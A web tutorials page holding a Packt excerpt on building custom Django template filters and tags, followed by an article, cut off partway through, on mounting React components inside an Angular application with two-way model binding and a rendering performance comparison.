
How-To Tutorials - Web Development


Introduction to Custom Template Filters and Tags

Packt
13 Oct 2014
25 min read
This article is written by Aidas Bendoraitis, the author of Web Development with Django Cookbook. In this article, we will cover the following recipes:

- Following conventions for your own template filters and tags
- Creating a template filter to show how many days have passed
- Creating a template filter to extract the first media object
- Creating a template filter to humanize URLs
- Creating a template tag to include a template if it exists
- Creating a template tag to load a QuerySet in a template
- Creating a template tag to parse content as a template
- Creating a template tag to modify request query parameters

As you know, Django has quite an extensive template system, with features such as template inheritance, filters for changing the representation of values, and tags for presentational logic. Moreover, Django allows you to add your own template filters and tags in your apps. Custom filters or tags should be located in a template-tag library file under the templatetags Python package in your app. Your template-tag library can then be loaded in any template with a {% load %} template tag. In this article, we will create several useful filters and tags that give more control to the template editors.

Following conventions for your own template filters and tags

Custom template filters and tags can become a total mess if you don't have consistent guidelines to follow. Template filters and tags should serve template editors as much as possible. They should be both handy and flexible. In this recipe, we will look at some conventions that should be used when enhancing the functionality of the Django template system.

How to do it...

Follow these conventions when extending the Django template system:

- Don't create or use custom template filters or tags when the logic for the page fits better in the view, context processors, or in model methods. When your page is context-specific, such as a list of objects or an object-detail view, load the object in the view. If you need to show some content on every page, create a context processor. Use custom methods of the model instead of template filters when you need to get some properties of an object not related to the context of the template.
- Name the template-tag library with the _tags suffix. When your app is named differently than your template-tag library, you can avoid ambiguous package importing problems.
- In the newly created library, separate filters from tags, for example, by using comments such as the following:

```python
# -*- coding: UTF-8 -*-
from django import template

register = template.Library()

### FILTERS ###
# .. your filters go here ..

### TAGS ###
# .. your tags go here ..
```

- Create template tags that are easy to remember by including the following constructs:
  - for [app_name.model_name]: Include this construct to use a specific model
  - using [template_name]: Include this construct to use a template for the output of the template tag
  - limit [count]: Include this construct to limit the results to a specific amount
  - as [context_variable]: Include this construct to save the results to a context variable that can be reused many times later
- Try to avoid multiple values defined positionally in template tags unless they are self-explanatory. Otherwise, this will likely confuse the template developers.
- Make as many arguments resolvable as possible. Strings without quotes should be treated as context variables that need to be resolved or as short words that remind you of the structure of the template tag components. An invocation illustrating these constructs is shown after this list.
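To make the constructs concrete, here is how an invocation of a well-named template tag could look. The tag and its arguments are hypothetical, purely to illustrate the for/using/limit/as conventions described above:

```
{% load blog_tags %}
{% get_latest_posts for blog.Post using "blog/includes/post_item.html" limit 5 as latest_posts %}
```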
See also

- The Creating a template filter to show how many days have passed recipe
- The Creating a template filter to extract the first media object recipe
- The Creating a template filter to humanize URLs recipe
- The Creating a template tag to include a template if it exists recipe
- The Creating a template tag to load a QuerySet in a template recipe
- The Creating a template tag to parse content as a template recipe
- The Creating a template tag to modify request query parameters recipe

Creating a template filter to show how many days have passed

Not all people keep track of the date, and when talking about creation or modification dates of cutting-edge information, for many of us, it is more convenient to read the time difference, for example, the blog entry was posted three days ago, the news article was published today, and the user last logged in yesterday. In this recipe, we will create a template filter named days_since that converts dates to humanized time differences.

Getting ready

Create the utils app and put it under INSTALLED_APPS in the settings, if you haven't done that yet. Then, create a Python package named templatetags inside this app (Python packages are directories with an empty __init__.py file).

How to do it...

Create a utility_tags.py file with this content:

```python
# utils/templatetags/utility_tags.py
# -*- coding: UTF-8 -*-
from datetime import datetime
from django import template
from django.utils.translation import ugettext_lazy as _
from django.utils.timezone import now as tz_now

register = template.Library()

### FILTERS ###

@register.filter
def days_since(value):
    """ Returns number of days between today and value. """
    today = tz_now().date()
    if isinstance(value, datetime):
        value = value.date()
    diff = today - value
    if diff.days > 1:
        return _("%s days ago") % diff.days
    elif diff.days == 1:
        return _("yesterday")
    elif diff.days == 0:
        return _("today")
    else:
        # Date is in the future; return formatted date.
        return value.strftime("%B %d, %Y")
```

How it works...

If you use this filter in a template like the following, it will render something like yesterday or 5 days ago:

```
{% load utility_tags %}
{{ object.created|days_since }}
```

You can apply this filter to values of the date and datetime types. Each template-tag library has a register where filters and tags are collected. Django filters are functions registered by the register.filter decorator. By default, the filter in the template system will be named the same as the function or the other callable object. If you want, you can set a different name for the filter by passing name to the decorator, as follows:

```python
@register.filter(name="humanized_days_since")
def days_since(value):
    ...
```

The filter itself is quite self-explanatory. At first, the current date is read. If the given value of the filter is of the datetime type, the date is extracted. Then, the difference between today and the extracted value is calculated. Depending on the number of days, different string results are returned.

There's more...

This filter is easy to extend to also show the difference in time, such as just now, 7 minutes ago, or 3 hours ago. Just operate on the datetime values instead of the date values, as in the sketch below.
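A minimal sketch of such an extension (my own illustration, not from the book; it assumes timezone-aware datetime values and the same imports and register as the days_since listing):

```python
@register.filter
def time_since(value):
    """ Returns a humanized time difference such as "just now",
    "7 minutes ago", or "3 hours ago"; falls back to days_since
    for differences of a day or more. Future dates are not handled. """
    now = tz_now()
    delta = now - value  # assumes value is a timezone-aware datetime
    if delta.days >= 1:
        return days_since(value)
    hours = delta.seconds // 3600
    if hours > 0:
        return _("%s hours ago") % hours
    minutes = delta.seconds // 60
    if minutes > 0:
        return _("%s minutes ago") % minutes
    return _("just now")
```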
See also

- The Creating a template filter to extract the first media object recipe
- The Creating a template filter to humanize URLs recipe

Creating a template filter to extract the first media object

Imagine that you are developing a blog overview page, and for each post, you want to show images, music, or videos in that page taken from the content. In such a case, you need to extract the <img>, <object>, and <embed> tags out of the HTML content of the post. In this recipe, we will see how to do this using regular expressions in the get_first_media filter.

Getting ready

We will start with the utils app that should be set in INSTALLED_APPS in the settings and the templatetags package inside this app.

How to do it...

In the utility_tags.py file, add the following content:

```python
# utils/templatetags/utility_tags.py
# -*- coding: UTF-8 -*-
import re
from django import template
from django.utils.safestring import mark_safe

register = template.Library()

### FILTERS ###

media_file_regex = re.compile(
    r"<object .+?</object>|"
    r"<(img|embed) [^>]+>"
)

@register.filter
def get_first_media(content):
    """ Returns the first image or flash file from the html content """
    m = media_file_regex.search(content)
    media_tag = ""
    if m:
        media_tag = m.group()
    return mark_safe(media_tag)
```

How it works...

While the HTML content in the database is valid, when you put the following code in the template, it will retrieve the <object>, <img>, or <embed> tags from the content field of the object, or an empty string if no media is found there:

```
{% load utility_tags %}
{{ object.content|get_first_media }}
```

At first, we define the compiled regular expression as media_file_regex, then in the filter, we perform a search for that regular expression pattern. By default, the result would show the <, >, and & symbols escaped as &lt;, &gt;, and &amp; entities. But we use the mark_safe function that marks the result as safe HTML ready to be shown in the template without escaping.

There's more...

It is very easy to extend this filter to also extract the <iframe> tags (which are more recently being used by Vimeo and YouTube for embedded videos) or the HTML5 <audio> and <video> tags. Just modify the regular expression like this:

```python
media_file_regex = re.compile(
    r"<iframe .+?</iframe>|"
    r"<audio .+?</audio>|<video .+?</video>|"
    r"<object .+?</object>|<(img|embed) [^>]+>"
)
```

See also

- The Creating a template filter to show how many days have passed recipe
- The Creating a template filter to humanize URLs recipe

Creating a template filter to humanize URLs

Usually, common web users enter URLs into address fields without the protocol and trailing slashes. In this recipe, we will create a humanize_url filter used to present URLs to the user in a shorter format, truncating very long addresses, just like what Twitter does with the links in tweets.

Getting ready

As in the previous recipes, we will start with the utils app that should be set in INSTALLED_APPS in the settings, and should contain the templatetags package.

How to do it...

In the FILTERS section of the utility_tags.py template library in the utils app, let's add a filter named humanize_url and register it:

```python
# utils/templatetags/utility_tags.py
# -*- coding: UTF-8 -*-
import re
from django import template

register = template.Library()

### FILTERS ###

@register.filter
def humanize_url(url, letter_count):
    """ Returns a shortened human-readable URL """
    letter_count = int(letter_count)
    re_start = re.compile(r"^https?://")
    re_end = re.compile(r"/$")
    url = re_end.sub("", re_start.sub("", url))
    if len(url) > letter_count:
        url = u"%s…" % url[:letter_count - 1]
    return url
```

How it works...

We can use the humanize_url filter in any template like this:

```
{% load utility_tags %}
<a href="{{ object.website }}" target="_blank">{{ object.website|humanize_url:30 }}</a>
```

The filter uses regular expressions to remove the leading protocol and the trailing slash, and then shortens the URL to the given amount of letters, adding an ellipsis to the end if the URL doesn't fit into the specified letter count.
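A couple of illustrative inputs and outputs for the filter (my own examples, not from the book):

```python
humanize_url("http://www.example.com/very/long/path/", 20)
# -> u"www.example.com/ver…"

humanize_url("https://djangoproject.com", 30)
# -> u"djangoproject.com" (short enough, returned unshortened)
```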
See also

- The Creating a template filter to show how many days have passed recipe
- The Creating a template filter to extract the first media object recipe
- The Creating a template tag to include a template if it exists recipe

Creating a template tag to include a template if it exists

Django has the {% include %} template tag that renders and includes another template. However, in some situations it is a problem that an error is raised if the template does not exist. In this recipe, we will show you how to create a {% try_to_include %} template tag that includes another template, but fails silently if there is no such template.

Getting ready

We will start again with the utils app that should be installed and is ready for custom template tags.

How to do it...

Template tags consist of two things: the function parsing the arguments of the template tag and the node class that is responsible for the logic of the template tag as well as for the output. Perform the following steps.

First, let's create the function parsing the template-tag arguments:

```python
# utils/templatetags/utility_tags.py
# -*- coding: UTF-8 -*-
from django import template
from django.template.loader import get_template

register = template.Library()

### TAGS ###

@register.tag
def try_to_include(parser, token):
    """
    Usage: {% try_to_include "sometemplate.html" %}
    This will fail silently if the template doesn't exist.
    If it does, it will be rendered with the current context.
    """
    try:
        tag_name, template_name = token.split_contents()
    except ValueError:
        raise template.TemplateSyntaxError, \
            "%r tag requires a single argument" % token.contents.split()[0]
    return IncludeNode(template_name)
```

Then, we need the node class in the same file, as follows:

```python
class IncludeNode(template.Node):
    def __init__(self, template_name):
        self.template_name = template_name

    def render(self, context):
        try:
            # Loading the template and rendering it
            template_name = template.resolve_variable(self.template_name, context)
            included_template = get_template(template_name).render(context)
        except template.TemplateDoesNotExist:
            included_template = ""
        return included_template
```

How it works...

The {% try_to_include %} template tag expects one argument, that is, template_name. So, in the try_to_include function, we are trying to assign the split contents of the token only to the tag_name variable (which is "try_to_include") and the template_name variable. If this doesn't work, the template syntax error is raised. The function returns the IncludeNode object, which gets the template_name field for later usage. In the render method of IncludeNode, we resolve the template_name variable. If a context variable was passed to the template tag, then its value will be used here for template_name. If a quoted string was passed to the template tag, then the content within quotes will be used for template_name. Lastly, we try to load the template and render it with the current template context. If that doesn't work, an empty string is returned.
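As an aside on why token.split_contents() is used rather than a plain string split: split_contents() keeps quoted arguments together, which matters as soon as a template path contains spaces. An illustrative comparison (my example, not from the book):

```python
# For the token {% try_to_include "some template.html" %}:
token.contents.split()
# -> ['try_to_include', '"some', 'template.html"']
token.split_contents()
# -> ['try_to_include', '"some template.html"']
```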
There are at least two situations where we could use this template tag:

- When including a template whose path is defined in a model, as follows:

```
{% load utility_tags %}
{% try_to_include object.template_path %}
```

- When including a template whose path is defined with the {% with %} template tag somewhere high in the template context variable's scope. This is especially useful when you need to create custom layouts for plugins in the placeholder of a template in Django CMS:

```
{# templates/cms/start_page.html #}
{% with editorial_content_template_path="cms/plugins/editorial_content/start_page.html" %}
    {% placeholder "main_content" %}
{% endwith %}

{# templates/cms/plugins/editorial_content.html #}
{% load utility_tags %}
{% if editorial_content_template_path %}
    {% try_to_include editorial_content_template_path %}
{% else %}
    <div><!-- Some default presentation of editorial content plugin --></div>
{% endif %}
```

There's more...

You can use the {% try_to_include %} tag as well as the default {% include %} tag to include templates that extend other templates. This has a beneficial use for large-scale portals where you have different kinds of lists in which complex items share the same structure as widgets but have a different source of data. For example, in the artist list template, you can include the artist item template as follows:

```
{% load utility_tags %}
{% for object in object_list %}
    {% try_to_include "artists/includes/artist_item.html" %}
{% endfor %}
```

This template will extend from the item base as follows:

```
{# templates/artists/includes/artist_item.html #}
{% extends "utils/includes/item_base.html" %}

{% block item_title %}
    {{ object.first_name }} {{ object.last_name }}
{% endblock %}
```

The item base defines the markup for any item and also includes a Like widget, as follows:

```
{# templates/utils/includes/item_base.html #}
{% load likes_tags %}
<h3>{% block item_title %}{% endblock %}</h3>
{% if request.user.is_authenticated %}
    {% like_widget for object %}
{% endif %}
```

See also

- The Creating a template tag to load a QuerySet in a template recipe
- The Creating a template tag to parse content as a template recipe
- The Creating a template tag to modify request query parameters recipe

Creating a template tag to load a QuerySet in a template

Most often, the content that should be shown in a web page will have to be defined in the view. If this is the content to show on every page, it is logical to create a context processor. Another situation is when you need to show additional content such as the latest news or a random quote on some specific pages, for example, the start page or the details page of an object. In this case, you can load the necessary content with the {% get_objects %} template tag, which we will implement in this recipe.

Getting ready

Once again, we will start with the utils app that should be installed and ready for custom template tags.

How to do it...

Template tags consist of a function parsing the arguments passed to the tag and a node class that renders the output of the tag or modifies the template context.
Perform the following steps. First, let's create the function parsing the template-tag arguments, as follows:

```python
# utils/templatetags/utility_tags.py
# -*- coding: UTF-8 -*-
from django.db import models
from django import template

register = template.Library()

### TAGS ###

@register.tag
def get_objects(parser, token):
    """
    Gets a queryset of objects of the model specified by app and model names

    Usage:
        {% get_objects [<manager>.]<method> from <app_name>.<model_name> [limit <amount>] as <var_name> %}

    Examples:
        {% get_objects latest_published from people.Person limit 3 as people %}
        {% get_objects site_objects.all from news.Article limit 3 as articles %}
        {% get_objects site_objects.all from news.Article as articles %}
    """
    amount = None
    try:
        tag_name, manager_method, str_from, appmodel, str_limit, \
            amount, str_as, var_name = token.split_contents()
    except ValueError:
        try:
            tag_name, manager_method, str_from, appmodel, str_as, \
                var_name = token.split_contents()
        except ValueError:
            raise template.TemplateSyntaxError, \
                "get_objects tag requires the following syntax: " \
                "{% get_objects [<manager>.]<method> from " \
                "<app_name>.<model_name> [limit <amount>] as <var_name> %}"
    try:
        app_name, model_name = appmodel.split(".")
    except ValueError:
        raise template.TemplateSyntaxError, \
            "get_objects tag requires application name and " \
            "model name separated by a dot"
    model = models.get_model(app_name, model_name)
    return ObjectsNode(model, manager_method, amount, var_name)
```

Then, we create the node class in the same file, as follows:

```python
class ObjectsNode(template.Node):
    def __init__(self, model, manager_method, amount, var_name):
        self.model = model
        self.manager_method = manager_method
        self.amount = amount
        self.var_name = var_name

    def render(self, context):
        if "." in self.manager_method:
            manager, method = self.manager_method.split(".")
        else:
            manager = "_default_manager"
            method = self.manager_method
        qs = getattr(
            getattr(self.model, manager),
            method,
            self.model._default_manager.none,
        )()
        if self.amount:
            amount = template.resolve_variable(self.amount, context)
            context[self.var_name] = qs[:amount]
        else:
            context[self.var_name] = qs
        return ""
```

How it works...

The {% get_objects %} template tag loads a QuerySet defined by the manager method from a specified app and model, limits the result to the specified amount, and saves the result to a context variable. This is the simplest example of how to use the template tag that we have just created. It will load five news articles in any template using the following snippet:

```
{% load utility_tags %}
{% get_objects all from news.Article limit 5 as latest_articles %}
{% for article in latest_articles %}
    <a href="{{ article.get_url_path }}">{{ article.title }}</a>
{% endfor %}
```

This is using the all method of the default objects manager of the Article model, and will sort the articles by the ordering attribute defined in the Meta class. A more advanced example would be to create a custom manager with a custom method to query objects from the database. A manager is an interface that provides database query operations to models. Each model has at least one manager called objects by default.
As an example, let's create the Artist model, which has a draft or published status, and a new manager, custom_manager, which allows you to select random published artists:

```python
# artists/models.py
# -*- coding: UTF-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _

STATUS_CHOICES = (
    ('draft', _("Draft")),
    ('published', _("Published")),
)

class ArtistManager(models.Manager):
    def random_published(self):
        return self.filter(status="published").order_by('?')

class Artist(models.Model):
    # ...
    status = models.CharField(_("Status"), max_length=20, choices=STATUS_CHOICES)
    custom_manager = ArtistManager()
```

To load a random published artist, you add the following snippet to any template:

```
{% load utility_tags %}
{% get_objects custom_manager.random_published from artists.Artist limit 1 as random_artists %}
{% for artist in random_artists %}
    {{ artist.first_name }} {{ artist.last_name }}
{% endfor %}
```

Let's look at the code of the template tag. In the parsing function, one of two formats is expected: with the limit and without it. The string is parsed, the model is recognized, and then the components of the template tag are passed to the ObjectsNode class. In the render method of the node class, we check the manager's name and its method's name. If this is not defined, _default_manager will be used, which is, in most cases, the same as objects. After that, we call the manager method and fall back to an empty QuerySet if the method doesn't exist. If the limit is defined, we resolve its value and limit the QuerySet. Lastly, we save the QuerySet to the context variable. Stripped of the template-tag plumbing, the rendering step boils down to the sketch below.
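For the random-artist snippet above, a rough plain-Python equivalent of what ObjectsNode.render does (my own illustration, not from the book):

```python
# {% get_objects custom_manager.random_published from artists.Artist limit 1 as random_artists %}
# is roughly equivalent to:
qs = Artist.custom_manager.random_published()  # resolve the manager and call its method
context["random_artists"] = qs[:1]             # apply the limit, save to the context variable
```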
See also

- The Creating a template tag to include a template if it exists recipe
- The Creating a template tag to parse content as a template recipe
- The Creating a template tag to modify request query parameters recipe

Creating a template tag to parse content as a template

In this recipe, we will create a template tag named {% parse %}, which allows you to put template snippets into the database. This is valuable when you want to provide different content for authenticated and non-authenticated users, when you want to include a personalized salutation, or when you don't want to hardcode media paths in the database.

Getting ready

No surprise, we will start with the utils app that should be installed and ready for custom template tags.

How to do it...

Template tags consist of two things: the function parsing the arguments of the template tag and the node class that is responsible for the logic of the template tag as well as for the output. Perform the following steps.

First, let's create the function parsing the template-tag arguments, as follows:

```python
# utils/templatetags/utility_tags.py
# -*- coding: UTF-8 -*-
from django import template

register = template.Library()

### TAGS ###

@register.tag
def parse(parser, token):
    """
    Parses the value as a template and prints it or saves to a variable

    Usage:
        {% parse <template_value> [as <variable>] %}

    Examples:
        {% parse object.description %}
        {% parse header as header %}
        {% parse "{{ MEDIA_URL }}js/" as js_url %}
    """
    bits = token.split_contents()
    tag_name = bits.pop(0)
    try:
        template_value = bits.pop(0)
        var_name = None
        if len(bits) == 2:
            bits.pop(0)  # remove the word "as"
            var_name = bits.pop(0)
    except (ValueError, IndexError):
        raise template.TemplateSyntaxError, \
            "parse tag requires the following syntax: " \
            "{% parse <template_value> [as <variable>] %}"
    return ParseNode(template_value, var_name)
```

Then, we create the node class in the same file, as follows:

```python
class ParseNode(template.Node):
    def __init__(self, template_value, var_name):
        self.template_value = template_value
        self.var_name = var_name

    def render(self, context):
        template_value = template.resolve_variable(self.template_value, context)
        t = template.Template(template_value)
        context_vars = {}
        for d in list(context):
            for var, val in d.items():
                context_vars[var] = val
        result = t.render(template.RequestContext(context['request'], context_vars))
        if self.var_name:
            context[self.var_name] = result
            return ""
        return result
```

How it works...

The {% parse %} template tag allows you to parse a value as a template and to render it immediately or to save it as a context variable. If we have an object with a description field, which can contain template variables or logic, then we can parse it and render it using the following code:

```
{% load utility_tags %}
{% parse object.description %}
```

It is also possible to define a value to parse using a quoted string like this:

```
{% load utility_tags %}
{% parse "{{ STATIC_URL }}site/img/" as img_path %}
<img src="{{ img_path }}someimage.png" alt="" />
```

Let's have a look at the code of the template tag. The parsing function checks the arguments of the template tag bit by bit. At first, we expect the name parse, then the template value, then optionally the word as, and lastly the context variable name. The template value and the variable name are passed to the ParseNode class. The render method of that class first resolves the value of the template variable and creates a template object out of it. Then, it renders the template with all the context variables. If the variable name is defined, the result is saved to it; otherwise, the result is shown immediately. The salutation example below shows what this makes possible.
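For instance, the description field stored in the database might itself contain template logic for a personalized salutation (a hypothetical field value, my own example):

```
{# value stored in object.description #}
{% if request.user.is_authenticated %}
    Hello, {{ request.user.username }}!
{% else %}
    Welcome, dear guest!
{% endif %}
```

Rendering it with {% parse object.description %} then greets each visitor appropriately, which a plain {{ object.description }} output could never do.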
See also

- The Creating a template tag to include a template if it exists recipe
- The Creating a template tag to load a QuerySet in a template recipe
- The Creating a template tag to modify request query parameters recipe

Creating a template tag to modify request query parameters

Django has a convenient and flexible system to create canonical, clean URLs just by adding regular expression rules in the URL configuration files. But there is a lack of built-in mechanisms to manage query parameters. Views such as search or filterable object lists need to accept query parameters to drill down through filtered results using another parameter or to go to another page. In this recipe, we will create a template tag named {% append_to_query %}, which lets you add, change, or remove parameters of the current query.

Getting ready

Once again, we start with the utils app that should be set in INSTALLED_APPS and should contain the templatetags package. Also, make sure that you have the request context processor set for the TEMPLATE_CONTEXT_PROCESSORS setting, as follows:

```python
# settings.py
TEMPLATE_CONTEXT_PROCESSORS = (
    "django.contrib.auth.context_processors.auth",
    "django.core.context_processors.debug",
    "django.core.context_processors.i18n",
    "django.core.context_processors.media",
    "django.core.context_processors.static",
    "django.core.context_processors.tz",
    "django.contrib.messages.context_processors.messages",
    "django.core.context_processors.request",
)
```

How to do it...

For this template tag, we will be using the simple_tag decorator that parses the components and requires you to define just the rendering function, as follows:

```python
# utils/templatetags/utility_tags.py
# -*- coding: UTF-8 -*-
import urllib
from django import template
from django.utils.encoding import force_str

register = template.Library()

### TAGS ###

@register.simple_tag(takes_context=True)
def append_to_query(context, **kwargs):
    """ Renders a link with modified current query parameters """
    query_params = context['request'].GET.copy()
    for key, value in kwargs.items():
        query_params[key] = value
    query_string = u""
    if len(query_params):
        query_string += u"?%s" % urllib.urlencode([
            (key, force_str(value))
            for (key, value) in query_params.iteritems() if value
        ]).replace('&', '&amp;')
    return query_string
```

How it works...

The {% append_to_query %} template tag reads the current query parameters from the request.GET dictionary-like QueryDict object into a new dictionary named query_params, and loops through the keyword parameters passed to the template tag, updating the values. Then, the new query string is formed, all spaces and special characters are URL-encoded, and the ampersands connecting query parameters are escaped. This new query string is returned to the template. To read more about QueryDict objects, refer to the official Django documentation: https://docs.djangoproject.com/en/1.6/ref/request-response/#querydict-objects

Let's have a look at an example of how the {% append_to_query %} template tag can be used. If the current URL is http://127.0.0.1:8000/artists/?category=fine-art&page=1, we can use the following template tag to render a link that goes to the next page:

```
{% load utility_tags %}
<a href="{% append_to_query page=2 %}">2</a>
```

The following is the output rendered, using the preceding template tag:

```html
<a href="?category=fine-art&amp;page=2">2</a>
```

Or we can use the following template tag to render a link that resets pagination and goes to another category:

```
{% load utility_tags i18n %}
<a href="{% append_to_query category="sculpture" page="" %}">{% trans "Sculpture" %}</a>
```

The following is the output rendered, using the preceding template tag:

```html
<a href="?category=sculpture">Sculpture</a>
```

See also

- The Creating a template tag to include a template if it exists recipe
- The Creating a template tag to load a QuerySet in a template recipe
- The Creating a template tag to parse content as a template recipe

Summary

This article showed you how to create and use your own template filters and tags. The default Django template system is quite extensive, but there are always more things to add for different cases.


Interfacing React Components with Angular Applications

Patrick Marabeas
26 Sep 2014
10 min read
There's been talk lately of using React as the view within Angular's MVC architecture. Angular, as we all know, uses dirty checking. As I'll touch on later, it accepts the fact of (minor) performance loss to gain the great two-way data binding it has. React, on the other hand, uses a virtual DOM and only renders the difference. This results in very fast performance. So, how do we leverage React's performance from our Angular application? Can we retain two-way data flow? And just how significant is the performance increase? The nrg module and demo code can be found over on my GitHub.

The application

To demonstrate communication between the two frameworks, let's build a reusable Angular module (nrg [Angular(ng) + React(r) = energy(nrg)!]) which will render (and re-render) a React component when our model changes. The React component will be composed of an input and a p element that will display our model and will also update the model on change. To show this, we'll add an input and a p to our view bound to the model. In essence, changes to either input should result in all elements being kept in sync. We'll also add a button to our component that will demonstrate component unmounting on scope destruction.

```javascript
;(function(window, document, angular, undefined) {
    'use strict';

    angular.module('app', ['nrg'])
        .controller('MainController', ['$scope', function($scope) {
            $scope.text = 'This is set in Angular';
            $scope.destroy = function() {
                $scope.$destroy();
            }
        }]);
})(window, document, angular);
```

- data-component specifies the React component we want to mount.
- data-ctrl (optional) specifies the controller we want to inject into the directive—this will allow specific components to be accessible on scope itself rather than scope.$parent.
- data-ng-model is the model we are going to pass between our Angular controller and our React view.

```html
<div data-ng-controller="MainController">
    <!-- React component -->
    <div data-component="reactComponent" data-ctrl="" data-ng-model="text">
        <!-- <input /> -->
        <!-- <button></button> -->
        <!-- <p></p> -->
    </div>

    <!-- Angular view -->
    <input type="text" data-ng-model="text" />
    <p>{{text}}</p>
</div>
```

As you can see, the view has meaning when using Angular to render React components. <div data-component="reactComponent" data-ctrl="" data-ng-model="text"></div> has meaning when compared to <div id="reactComponent"></div>, which requires referencing a script file to see what component (and settings) will be mounted on that element.

The Angular module - nrg.js

The main functions of this reusable Angular module will be to:

- Specify the DOM element that the component should be mounted onto.
- Render the React component when changes have been made to the model.
- Pass the scope and element attributes to the component.
- Unmount the React component when the Angular scope is destroyed.

The skeleton of our module looks like this:

```javascript
;(function(window, document, angular, React, undefined) {
    'use strict';

    angular.module('nrg', [])
```

To keep our code modular and extensible, we'll create a factory that will house our component functions, which are currently just render and unmount.

```javascript
    .factory('ComponentFactory', [function() {
        return {
            render: function() {
            },
            unmount: function() {
            }
        }
    }])
```

This will be injected into our directive.

```javascript
    .directive('component', ['$controller', 'ComponentFactory', function($controller, ComponentFactory) {
        return {
            restrict: 'EA',
```

If a controller has been specified on the element via data-ctrl, then inject the $controller service.
As mentioned earlier, this will allow scope variables and functions used within the React component to be accessible directly on scope, rather than scope.$parent (the controller also doesn't need to be declared in the view with ng-controller).

```javascript
            controller: function($scope, $element, $attrs) {
                return ($attrs.ctrl) ?
                    $controller($attrs.ctrl, {$scope: $scope, $element: $element, $attrs: $attrs}) :
                    null;
            },
```

Here's an isolated scope with two-way binding on data-ng-model.

```javascript
            scope: {
                ngModel: '='
            },
            link: function(scope, element, attrs) {
                // Calling ComponentFactory.render() & watching ng-model
            }
        }
    }]);
})(window, document, angular, React);
```

ComponentFactory

Fleshing out the ComponentFactory, we'll need to know how to render and unmount components.

```javascript
React.renderComponent(
    ReactComponent component,
    DOMElement container,
    [function callback]
)
```

As such, we'll need to pass the component we wish to mount (component), the container we want to mount it in (element) and any properties (attrs and scope) we wish to pass to the component. This render function will be called every time the model is updated, so the updated scope will be pushed through each time. According to the React documentation, "If the React component was previously rendered into container, this (React.renderComponent) will perform an update on it and only mutate the DOM as necessary to reflect the latest React component."

```javascript
    .factory('ComponentFactory', [function() {
        return {
            render: function(component, element, scope, attrs) {
                // If you have name-spaced your components, you'll want to
                // specify that here - or pass it in via an attribute etc
                React.renderComponent(window[component]({
                    scope: scope,
                    attrs: attrs
                }), element[0]);
            },
            unmount: function(element) {
                React.unmountComponentAtNode(element[0]);
            }
        }
    }])
```

Component directive

Back in our directive, we can now set up when we are going to call these two functions.

```javascript
    link: function(scope, element, attrs) {
        // Collect the element's attrs in a nice usable object
        var attributes = {};
        angular.forEach(element[0].attributes, function(a) {
            attributes[a.name.replace('data-', '')] = a.value;
        });

        // Render the component when the directive loads
        ComponentFactory.render(attrs.component, element, scope, attributes);

        // Watch the model and re-render the component
        scope.$watch('ngModel', function() {
            ComponentFactory.render(attrs.component, element, scope, attributes);
        }, true);

        // Unmount the component when the scope is destroyed
        scope.$on('$destroy', function() {
            ComponentFactory.unmount(element);
        });
    }
```

This implements dirty checking to see if the model has been updated. I haven't played around too much to see if there's a notable difference in performance between this and using a broadcast/listener. That said, to get a listener working as expected, you will need to wrap the render call in a $timeout to push it to the bottom of the stack to ensure scope is updated.

```javascript
    scope.$on('renderMe', function() {
        $timeout(function() {
            ComponentFactory.render(attrs.component, element, scope, attributes);
        });
    });
```

The React component

We can now build our React component, which will use the model we defined as well as inform Angular of any updates it performs.

```javascript
/** @jsx React.DOM */
;(function(window, document, React, undefined) {
    'use strict';

    window.reactComponent = React.createClass({
```

This is the content that will be rendered into the container. The properties that we passed to the component ({ scope: scope, attrs: attrs }) when we called React.renderComponent back in our component directive are now accessible via this.props.
```javascript
        render: function() {
            return (
                <div>
                    <input type='text' value={this.props.scope.ngModel} onChange={this.handleChange} />
                    <button onClick={this.deleteScope}>Destroy Scope</button>
                    <p>{this.props.scope.ngModel}</p>
                </div>
            )
        },
```

Via the onChange event, we can call for Angular to run a digest, just as we normally would, but accessing scope via this.props:

```javascript
        handleChange: function(event) {
            var _this = this;
            this.props.scope.$apply(function() {
                _this.props.scope.ngModel = event.target.value;
            });
        },
```

Here we deal with the click event deleteScope. The controller is accessible via scope.$parent. If we had injected a controller into the component directive, its contents would be accessible directly on scope, just as ngModel is.

```javascript
        deleteScope: function() {
            this.props.scope.$parent.destroy();
        }
    });
})(window, document, React);
```

The result

Putting this code together (you can view the completed code on GitHub, or see it in action) we end up with:

- Two input elements, both of which update the model. Any changes in either our Angular application or our React view will be reflected in both.
- A React component button that calls a function in our MainController, destroying the scope and also resulting in the unmounting of the component.

Pretty cool. But where is my perf increase!?

This is obviously too small an application for anything to be gained by throwing your view over to React. To demonstrate just how much faster applications can be (by using React as the view), we'll throw a kitchen sink worth of randomly generated data at it. 5000 bits to be precise. Now, it should be stated that you probably have a pretty questionable UI if you have this much data binding going on. Misko Hevery has a great response regarding Angular's performance on StackOverflow. In summary, humans are:

- Slow: Anything faster than 50ms is imperceptible to humans and thus can be considered as "instant".
- Limited: You can't really show more than about 2000 pieces of information to a human on a single page. Anything more than that is really bad UI, and humans can't process this anyway.

Basically, know Angular's limits and your users' limits! That said, the following performance test was certainly accentuated on mobile devices. Though, on the flip side, UI should be simpler on mobile.

Brute force performance demonstration

```javascript
;(function(window, document, angular, undefined) {
    'use strict';

    angular.module('app')
        .controller('NumberController', ['$scope', function($scope) {
            $scope.numbers = [];
            ($scope.numGen = function() {
                for (var i = 0; i < 5000; i++) {
                    $scope.numbers[i] = Math.floor(Math.random() * (999999999999999 - 1)) + 1;
                }
            })();
        }]);
})(window, document, angular);
```

Angular ng-repeat

```html
<div data-ng-controller="NumberController">
    <button ng-click="numGen()">Refresh Data</button>
    <table>
        <tr ng-repeat="number in numbers">
            <td>{{number}}</td>
        </tr>
    </table>
</div>
```

There was definite lag felt as the numbers were loaded in and refreshed. From start to finish, this took around 1.5 seconds.

React component

```html
<div data-ng-controller="NumberController">
    <button ng-click="numGen()">Refresh Data</button>
    <div data-component="numberComponent" data-ng-model="numbers"></div>
</div>
```

```javascript
;(function(window, document, React, undefined) {
    window.numberComponent = React.createClass({
        render: function() {
            var rows = this.props.scope.ngModel.map(function(number) {
                return (
                    <tr>
                        <td>{number}</td>
                    </tr>
                );
            });
            return (
                <table>{rows}</table>
            );
        }
    });
})(window, document, React);
```

So that just happened. 270 milliseconds start to finish. Around 80% faster!
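The post doesn't show how these timings were taken; one simple way to reproduce such a measurement in the browser console is to time from the refresh call until the next painted frame (a sketch of my own, assuming Angular debug info is enabled so that .scope() works):

```javascript
// Time one data refresh: start the timer, trigger numGen() inside a
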